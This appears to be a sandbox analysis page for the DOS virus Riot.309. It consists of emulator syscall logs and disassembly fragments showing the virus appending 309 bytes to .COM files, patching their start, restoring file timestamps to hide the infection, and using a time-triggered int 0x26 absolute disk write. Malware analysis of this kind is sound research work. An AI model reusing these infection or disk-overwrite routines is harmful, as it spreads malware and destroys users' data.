Sample viewer

vx.netlux.org/Virus.DOS.Riot.309

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:47:25.834423769Z 26 PC: 12a85 | Set disk transfer address
2018-12-17T22:47:25.835943945Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:25.846213378Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-17T22:47:25.853371817Z 78 PC: 12a94 | Find first file
2018-12-17T22:47:25.859994129Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:25.876610577Z 61 PC: 12acb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:47:25.883655903Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:25.885650951Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:25.893829135Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:25.895660987Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:47:25.898272874Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:25.907666443Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:25.910606977Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:25.918252811Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:25.920637682Z 62 PC: 12b23 | Close file
2018-12-17T22:47:25.930109367Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:25.933521296Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:25.944330134Z 61 PC: 12acb | Open file (Filename = 'PRINT.COM')
2018-12-17T22:47:25.95229598Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:25.953833318Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:25.960908189Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:25.963009066Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:47:25.965950463Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:25.969568801Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:25.972418525Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:25.975123877Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:25.976768316Z 62 PC: 12b23 | Close file
2018-12-17T22:47:25.983821197Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:25.986469613Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:25.996962476Z 61 PC: 12acb | Open file (Filename = 'HELLO.COM')
2018-12-17T22:47:26.005463557Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.007640607Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.0148487Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.016732779Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:47:26.020569026Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.024006735Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.02586701Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.029896019Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.031394214Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.037905116Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.040996153Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.049342263Z 61 PC: 12acb | Open file (Filename = 'PHANG.COM')
2018-12-17T22:47:26.054906307Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.057469443Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.064832525Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.066942089Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:47:26.070180783Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.074509386Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.076516086Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.081595319Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.084825817Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.093392713Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.096766742Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.108259794Z 61 PC: 12acb | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:47:26.116677258Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.11850402Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.126545057Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.128831222Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:47:26.131640129Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.140749393Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.143283344Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.146489437Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.14816768Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.156276625Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.160656233Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.171502179Z 61 PC: 12acb | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:47:26.180310989Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.182255763Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.189018387Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.191423135Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:47:26.194270916Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.203004945Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.205500183Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.21298266Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.214871759Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.223696479Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.227165326Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.237569522Z 61 PC: 12acb | Open file (Filename = 'PAH.COM')
2018-12-17T22:47:26.245170262Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.247201008Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.254019277Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.255597572Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:47:26.259721029Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.263034985Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.264861256Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.269029818Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.270985232Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.2788835Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.282760584Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.293437884Z 61 PC: 12acb | Open file (Filename = 'TEST.COM')
2018-12-17T22:47:26.300500403Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.303015307Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.306194871Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.308150896Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:47:26.310982336Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.321423491Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.323324012Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.33058271Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.334217278Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.342794422Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.345751568Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
0x12aa4: ja 0x12aaf
0x12aa6: mov al, 2
0x12aa8: mov cx, 0x4d2
0x12aab: cdq
0x12aac: int 0x26
0x12aae: popf
0x12aaf: mov dx, 0x80
0x12ab2: mov ah, 0x1a
0x12ab4: int 0x21
0x12ab6: mov di, 0x100
0x12ab9: push di
0x12aba: ret
0x12abb: lea dx, word ptr [bp + 0x253]
0x12abf: mov ax, 0x4301
0x12ac2: xor cx, cx
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02
0x12ac9: int 0x21
0x12acb: jb 0x12b23
2018-12-17T22:47:26.349314221Z 26 PC: 12ab6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9223,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:42.522292339Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:22:42.524088059Z 67 PC: 12ac6 | Get or set file attributes
2018-12-25T12:22:42.533396155Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T12:22:42.541103496Z 78 PC: 12a94 | Find first file
2018-12-25T12:22:42.547605201Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.563123086Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.569622717Z 87 PC: 12ad3 | Get or set file date and time
2018-12-25T12:22:42.570972505Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:42.577669571Z 66 PC: 12aef | Move file pointer
2018-12-25T12:22:42.578990901Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-25T12:22:42.581129365Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-25T12:22:42.589774597Z 66 PC: 12b0d | Move file pointer
2018-12-25T12:22:42.591112325Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:42.597655055Z 87 PC: 12b1f | Get or set file date and time
2018-12-25T12:22:42.612653985Z 62 PC: 12b23 | Close file
2018-12-25T12:22:42.654856147Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.657447405Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.671603289Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.677857804Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.67908875Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.686087222Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.687653122Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.689809246Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.692773214Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.694385515Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.697086005Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.698856882Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.736331362Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.73881652Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.758055452Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.766338421Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.7681208Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.776614498Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.779266516Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.781625984Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.784389257Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.786388465Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.789109133Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.790636447Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.84273957Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.845754105Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.912571824Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.922196854Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.925016226Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.93137746Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.932925872Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.935649026Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.938323066Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.940254641Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.94446347Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.946586759Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.98320773Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.986778192Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.02827631Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.035100649Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.037878347Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.045277358Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.047050725Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.050369944Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.055128158Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.056540176Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.060011233Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.061859994Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.097386454Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.100391714Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.132263519Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.138660234Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.140483024Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.147594385Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.149245208Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.152180139Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.182493165Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.183784254Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.19099817Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.192431832Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.248398983Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.251823812Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.349086249Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.35721098Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.359234392Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.36623172Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.367686921Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.369942507Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.380186677Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.381828297Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.384787492Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.386986524Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.449005411Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.452764445Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.533734779Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.540641997Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.541948138Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.545073547Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.546313679Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.556250013Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.632572363Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.634048081Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.640428886Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.643010212Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.748820855Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.751554737Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
0x12aa4: ja 0x12aaf
0x12aa6: mov al, 2
0x12aa8: mov cx, 0x4d2
0x12aab: cdq
0x12aac: int 0x26
0x12aae: popf
0x12aaf: mov dx, 0x80
0x12ab2: mov ah, 0x1a
0x12ab4: int 0x21
0x12ab6: mov di, 0x100
0x12ab9: push di
0x12aba: ret
0x12abb: lea dx, word ptr [bp + 0x253]
0x12abf: mov ax, 0x4301
0x12ac2: xor cx, cx
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02
0x12ac9: int 0x21
0x12acb: jb 0x12b23
2018-12-25T12:22:43.75577237Z 26 PC: 12ab6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":9223,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:42.544255371Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:22:42.546726675Z 67 PC: 12ac6 | Get or set file attributes
2018-12-25T12:22:42.55597837Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T12:22:42.562902391Z 78 PC: 12a94 | Find first file
2018-12-25T12:22:42.569269135Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.584355455Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.591091168Z 87 PC: 12ad3 | Get or set file date and time
2018-12-25T12:22:42.592754848Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:42.602359404Z 66 PC: 12aef | Move file pointer
2018-12-25T12:22:42.60402955Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x22d]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-25T12:22:42.606518583Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-25T12:22:42.630648548Z 66 PC: 12b0d | Move file pointer
2018-12-25T12:22:42.631996309Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:42.636847727Z 87 PC: 12b1f | Get or set file date and time
2018-12-25T12:22:42.639766813Z 62 PC: 12b23 | Close file
2018-12-25T12:22:42.676553956Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.678528909Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.693414298Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.697943483Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.699320722Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.706620647Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.70824398Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.70979239Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.712144567Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.713904543Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.717479181Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.719835034Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.765752653Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.768835831Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.795893617Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.803011543Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.805230809Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.811832336Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.814835743Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.8178848Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.828839053Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.830277024Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.833715997Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.835393319Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.891703873Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.895574188Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.93927825Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.947608498Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.949997062Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.956316153Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.957924156Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.960822441Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.963938876Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.965571009Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.969096664Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.971255294Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.01390046Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.017176392Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.053213392Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.060141523Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.061790408Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.069709354Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.07144241Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.073636042Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.078073858Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.079435789Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.081919188Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.084029217Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.11323263Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.115720618Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.147108131Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.151654178Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.152923581Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.159546836Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.160795095Z 44 PC: 12afa | Get time (See above)
